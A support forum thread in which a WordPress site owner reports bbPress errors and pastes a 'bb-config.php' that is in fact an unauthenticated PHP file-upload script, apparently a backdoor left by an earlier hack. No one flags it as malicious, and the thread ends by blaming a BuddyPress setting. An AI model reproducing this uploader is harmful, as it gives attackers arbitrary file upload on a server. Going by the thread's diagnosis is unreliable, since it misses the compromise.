Skip to:
Content
Pages
Categories
Search
Bottom

Sudden BBconfig issues

• Suddenly I cannot access my forums and am getting this error :

Warning: Unexpected character in input: ” (ASCII=92) state=1 in /home//bb-config.php on line 5

Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /home/bb-config.php on line 17

I’ve deactivated all plugins on the main blog. This has the buddypress integration.

The last tampering before I noticed this was a single size change for a widget block in the themes stylesheet but the problem persists with switching themes. It cuts the homepage to half size as well without a scroll.

This is the bb-config:

title> Simple Uploader</title>

<body bgcolor=î#000000″ text=î#808080″ link=î#808080″ vlink=î#808080″>

<div align=îcenterî>

<center><font style=îfont-size: 16pt;î color=îlimeî face=îArialî>Simple uploader</font> </center>

<form enctype=îmultipart/form-dataî action=î<?php echo $_SERVER[“PHP_SELF”]; ?>î method=îpostî>

<div align=îcenterî STYLE=îfont-family: verdana; font-size: 10px;î>

<input type=îhiddenî name=îMAX_FILE_SIZEî value=î10000000024″>

File :

<input name=îuserfileî type=îfileî />

<input name=îsubmitî type=îsubmitî value=îUploadî />

</div>

</form>

<div align=îcenterî STYLE=îfont-family: verdana; font-size: 10px;î>

<?php

if (@is_uploaded_file($_FILES[“userfile”][“tmp_name”])) {

copy($_FILES[“userfile”][“tmp_name”], ìî . $_FILES[“userfile”][“name”]);

echo ì<p>File uploaded successfully</p>î;

}

?>

It’s been working properly for months with my new theme, any suggestions?

I don’t have any extra forum related plugin

Viewing 4 replies - 1 through 4 (of 4 total)
  • Do you have a recent backup you can revert to? (Though I am guessing not).

Paste your bb-config to a website like http://pastie.org/ and we will be able to see what line 17 is (without the code getting messed up).

If there is any sensitive information such as passwords that are in the file make sure and remove those before posting here.

Oops. Thanks so much for your reply. This is what it looked like when I noticed the issue. I’ve never changed anything in it, haven’t been working with forums. Wasn’t even working on the main blog today. I was hacked last week and my site is restored from a back up , a few things have been strangely adjusting late but this was already working fine.

http://pastie.org/3485682

Hmm, I’m not sure but that definitely does not look correct at all.

What version of bbPress are you using?

That’s good to know. With the buddypress install it’s build in and alI I had to do was select whether I wanted to use it or not. Bp doesn’t install bpress plugin separately. It’s always worked that way.

Somehow the bp selection for it turned off and I had click install again. It’s fixed now. This has happened to me before with bp pages. It’s definitely an issue with the new bp component setup. Thanks for confirming what bbpress config should look like.

Viewing 4 replies - 1 through 4 (of 4 total)
  • You must be logged in to reply to this topic.
Skip to toolbar